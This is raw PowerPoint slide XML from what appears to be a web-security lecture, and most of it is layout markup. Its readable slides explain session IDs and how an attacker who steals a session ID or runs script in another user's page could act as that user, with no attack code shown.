              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>their</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>IDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>(friend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>Dave)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>her</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>ID</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web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1"/>
              <a:t>charlie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>himself</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1"/>
              <a:t>alice’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>friend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>list,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>about</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1"/>
              <a:t>charlie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>steal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1"/>
              <a:t>alice’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>request</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web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>sever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1"/>
              <a:t>alice’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1"/>
              <a:t>charlie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>his</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1"/>
              <a:t>alice’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>webpage/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1"/>
              <a:t>alice’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>browser,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>code</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run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1"/>
              <a:t>alice’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>account.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>How</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1"/>
              <a:t>alice’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>webpage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7954205A-394C-6440-9075-CD42B85DC642}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145336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user post something, other user can see</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7954205A-394C-6440-9075-CD42B85DC642}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389437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890820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7483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31749" y="626619"/>
            <a:ext cx="214313" cy="317944"/>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schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="944563"/>
            <a:ext cx="7646051" cy="32818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23"/>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690573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userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-31749" y="354766"/>
            <a:ext cx="214313" cy="58979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6" name="Text Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="33034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9175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685800"/>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28650" y="1033397"/>
            <a:ext cx="7886700" cy="3599325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2100"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="135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sz="825"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A722859C-89A0-4C1D-B3B9-DD0F9998A67A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1406734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685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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501CD291-EBF4-47B8-BDB1-CD835FFC1B30}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3596857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7DE2-E1A2-4F41-96FE-94AF4425CB03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864066" y="347174"/>
            <a:ext cx="7651284" cy="4010907"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D2FFADE-E1BC-48C1-83AA-6DDDD39A33C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8020050" y="6329363"/>
            <a:ext cx="495300" cy="365125"/>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9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FB267019-40B7-405C-98B7-75F3216AFF79}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CBFC76A-A606-42CF-BCDF-C73975C150B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2071883" y="1150487"/>
            <a:ext cx="5200650" cy="907256"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26901180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0E680-E194-C549-A7C3-6A4C9D918498}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/16/21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135557-CA66-A344-87A9-06B9BD05243A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182367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6453642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hyperlink" Target="https://creativecommons.org/licenses/by-nc-sa/4.0/" TargetMode="Externa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4.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.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673" y="3869273"/>
            <a:ext cx="3742256" cy="1871128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="4385733"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="272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297220" y="3824672"/>
            <a:ext cx="579961" cy="1112897"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Title Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605260" y="1711614"/>
            <a:ext cx="5104958" cy="1170886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="UI_Seal_white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix amt="6000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
